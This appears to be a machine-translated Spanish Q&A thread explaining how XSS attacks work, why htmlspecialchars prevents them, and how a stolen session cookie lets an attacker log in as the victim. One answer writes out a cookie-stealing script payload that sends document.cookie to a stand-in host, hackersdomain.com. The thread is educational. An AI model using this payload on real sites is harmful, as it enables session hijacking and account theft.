Por lo tanto, evitar el ataque del sitio web XSS es muy simple, solo necesita usar la función htmlspecialchars
y está listo.
Pero si el desarrollador se olvidó de usarlo, ¿qué puede hacer el atacante/pirata informático? Él puede obtener su session_id, ¿verdad? Y aquí hay una pregunta. ¿Qué puede hacer con eso?
Muchas gracias.¿Cómo funciona realmente el ataque XSS?
Respuesta
Por lo tanto, evitar el ataque del sitio web de XSS es muy simple, solo tiene que utilizar la función htmlspecialchars y usted es bueno.
Derecha. Úselo en cualquier lugar cuando vaya a volver a mostrar entrada controlada por el usuario. Esto se refiere a todas las partes de la solicitud HTTP: encabezados, cuerpo y parámetros.
Pero si el desarrollador se olvidó de usarlo, ¿qué puede hacer el atacante/hacker?
S/he puede insertar algo de HTML/script malicioso. P.ej.lo siguiente en un cierto mensaje/comentario en una página web:
<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>
Lo anterior solicitar una imagen desde el dominio mailicious junto con la cookie documento como cadena de consulta.
Él puede obtener su session_id, ¿verdad? Y aquí hay una pregunta. ¿Qué puede hacer con eso?
La ID de la sesión se almacena en una cookie. Una vez que se informa al pirata informático de que se ha solicitado una imagen con la cookie en la cadena de consulta, todo lo que tiene que hacer es simplemente editar la cookie del navegador para incluir la misma ID de sesión para iniciar sesión como usuario original. Esto es obviamente muy peligroso si el usuario original es el administrador del sitio.
empezar a leer sobre XSS aquí: http://en.wikipedia.org/wiki/XSS y http://en.wikipedia.org/wiki/Cross-site_scripting
atacante A obtiene el miembro B para acceder al sitio C con las credenciales de B a través de un URI cuidadosamente construida.
A puede ejecutar cualquier JS que les guste en C usando las credenciales de B.
Esto les permite:
- presentar cualquier información que les gusta a B como si viniera de C
- Obtener el navegador de B para enviar cualquier información que desean de C a A Cuenta
- detalles
- información privada
- envía ninguna instrucción al sitio C como si viniera de una
- Publicar este tipo de spam
- Transferir dinero a esta cuenta
- Comprar esta muy caro libro electrónico
Si usted tiene una vulnerabilidad XSS en su sitio web, luego un pirata informático puede insertar cualquier código HTML en la página, incluida una etiqueta <script>
. Si estoy conectado a su sitio web y visito la página atacada, mi navegador ejecutará el JavaScript insertado allí por el pirata informático y hará que mi navegador haga lo que el hacker haya intentado.
Como enviar una solicitud POST a su servidor para cambiar mi contraseña, y luego cargar una URL del servidor del hacker para notificarlo de mi número de cuenta para que pueda iniciar sesión y robar mi cuenta.
Esta es la mejor explicación necesaria de XSS que he corrió en: Flash Animation Example
Aquí está la Second Video
- 1. Prevención de ataque XSS
- 2. ¿Cómo funciona XSS?
- 3. Ataque XSS en el sitio web de ASP.NET
- 4. ¿Es posible que un ataque XSS obtenga cookies HttpOnly?
- 5. ¿Cómo funciona realmente el volátil?
- 6. ¿Cómo funciona realmente el teléfono?
- 7. ataque XSS a htmlspecialchars de bypass() en atributo de valor
- 8. ataque XSS con javascript en img src atributo
- 9. ¿Cómo funciona realmente mongoDB?
- 10. ¿Cómo funciona el ataque de pulverización en montón?
- 11. ¿Cómo funciona realmente el rake db :: migrate?
- 12. ¿Cómo funciona `if (Test-Path ...)` realmente funciona?
- 13. ¿Cómo funciona realmente SSIS Dataflow?
- 14. ¿Cómo funciona un UpdatePanel realmente?
- 15. Ataque de sitio web ASP.NET: ¿cómo responder?
- 16. virtualenv reubicable - ¿realmente funciona
- 17. ¿Funciona realmente Flash10 + p2p?
- 18. ¿Cómo evitar aplicaciones de ataques XSS?
- 19. ¿Funciona realmente el filter_var FILTER_VALIDATE_EMAIL de PHP?
- 20. ¿onInterceptTouchEvent() realmente funciona como dijo el SDK?
- 21. ¿Funciona realmente el llavero en iOS?
- 22. ¿Cómo funciona realmente Affine Transform en Java?
- 23. ¿Cómo funciona realmente List :: Util 'shuffle'?
- 24. ¿Cómo funciona realmente DataAnnotations en MVC?
- 25. En Ruby, ¿cómo funciona realmente Coerce()?
- 26. ¿Cómo funciona realmente la opción make "-j"?
- 27. ¿Cómo funciona updatePolicy in maven realmente?
- 28. ¿Cómo funciona el hombre en el ataque medio en Diffie-Hellman?
- 29. ¿Cómo funciona realmente el Dynamic Proxy de Java?
- 30. Http and file uploading - ¿Cómo funciona realmente (bajo el capó)
Oye, ¿y si estoy usando 'ini_set ('session.use_only_cookies', 1);' en mi ¿guión? Aún así, 'document.cookie' va a funcionar? –